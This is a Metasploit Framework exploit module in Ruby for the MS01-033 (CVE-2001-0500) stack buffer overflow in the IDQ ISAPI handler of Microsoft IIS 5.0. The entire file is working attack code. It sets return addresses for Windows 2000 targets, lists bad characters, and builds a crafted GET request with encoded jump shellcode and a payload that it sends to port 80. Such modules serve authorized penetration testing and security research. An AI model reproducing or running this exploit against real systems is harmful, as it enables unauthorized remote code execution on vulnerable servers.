### $Id: ms01_033_idq.rb 9525 2010-06-15 07:18:08Z jduck $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##
require 'msf/core'class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,'Name' => 'Microsoft IIS 5.0 IDQ Path Overflow','Description'=> %q{
This module exploits a stack buffer overflow in the IDQ ISAPI handler for
Microsoft Index Server.},'Author' => ['MC'],'License'=> MSF_LICENSE,'Version'=> '$Revision: 9525 $','References' =>
[['CVE','2001-0500'],['OSVDB','568'],['MSB','MS01-033'],['BID','2880'],],'DefaultOptions' =>
{'EXITFUNC' => 'thread',},'Privileged' => false,'Payload'=>
{'Space'=> 800,'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",'StackAdjustment' => -3500,},'Platform' => 'win','Targets'=>
[['Windows 2000 Pro English SP0',{'Ret' => '0x6e8f3e24'}],['Windows 2000 Pro English SP1-SP2',{'Ret' => '0x6e8f8cc4'}],],'DisclosureDate' => 'Jun 18 2001','DefaultTarget' => 0))
register_options([Opt::RPORT(80)], self.class)end
def exploit
connect
sploit =rand_text_alphanumeric(1)+".idq?"+ rand_text_alphanumeric(232)
sploit << "%u06eb.%u"+ target.ret[-4, 4]+"%u"+ target.ret[-8, 4]
sploit << ".%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF="
sploit << rand_text_alphanumeric(1)+" HTTP/1.0\r\n\r\n"+ rand_text_alphanumeric(46)
uri = '/'+ sploit + payload.encoded
res = "GET #{uri}\r\n\r\n"
print_status("Trying target #{target.name}...")
sock.put(res)
handler
disconnect
endend
